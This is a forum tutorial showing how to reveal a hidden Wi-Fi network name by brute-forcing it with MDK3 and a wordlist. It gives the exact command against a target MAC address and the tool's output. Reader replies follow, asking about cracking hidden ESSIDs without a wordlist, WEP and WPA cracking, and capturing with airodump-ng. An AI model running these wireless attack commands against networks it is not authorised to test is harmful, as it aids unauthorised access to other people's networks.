How to bruteForce Hidden ESSID Using MDK3
MDK3's one of the best feature is to bruteforcing hideen ESSID's.it works in 2 way one we can try with every possible combination,suitable for short ESSID's or we can try using default/custom created ESSID list.I have attached shmoo group's WPA Tables ESSID with modification of some more default ESSID which I got from different forums.so now there is approx 1143 ESSID's.using MDK3 within few seconds you can get the Hidden ESSID's.
I have set the 11 chars. Essid and set it to hidden.
Tested using Linksys WUSB54GC adapter and Linksys WRT54G Router.
open one more window
#if command supplied without target -t parameter.it will bruteforce for all #hidden ESSID's in range.
bt ~ # mdk3 rausb0 p -f SSID.txt -t 00:21:29:68:16:C2
SSID Wordlist Mode activated!
Waiting for beacon frame from target...
Sniffer thread started
SSID is hidden. SSID Length is: 11.
Trying SSID: linksys
Trying SSID: ascend
Trying SSID: <any ssid>
Trying SSID: mynetwork
Trying SSID: fatport
Trying SSID: 2WIRE975
Trying SSID: 2WIRE186
Trying SSID: 2WIRE707
Trying SSID: 2WIRE774
Trying SSID: 2WIRE436
Packets sent: 1143 - Speed: 120 packets/sec
Got response from 00:21:29:68:16:C2, SSID: "thunderbolt"
Here you got hidden ESSID in less then 10 seconds.by default its speed is 300 pps.In airodump-ng window you can see that hidden essid <length: 11> has been now changed to your essid.e.g. thunderbolt.
Download Essid File
Is it posibble to crack hidden ESSID not using wordlist?
Hi my senior secure_it, may i ask u is it posibble to crack Hidden ESSID not using wordlist(dictionary list)? like crack WEP password just capture enought IVS than can easy crack that password without having any wordlist, because if the Hidden ESSID put the word are very2 difficult to guess(not a dictionary word) than our wordlist dont have this word than cannot crack already.And WPA security is it also same crack it must using wordlist, not same like WEP just capture enought IVS than can been crack. Thank u.
How to intercepted in clear-text once a client connects to the AP using a valid ESSID
Hi my Senior Tron Thank ur reply, may i ask you, if that AP ESSID is hidden than once a client connects to that AP using a valid ESSID, Than this is a GOOD chance to crack this hidden ESSID, Using what tools?how to do it? is it just using command: airodump-ng -w myfile -c 6 rausb0 , Than the hidden ESSID will apear on airodump-ng screen? Thank you very much.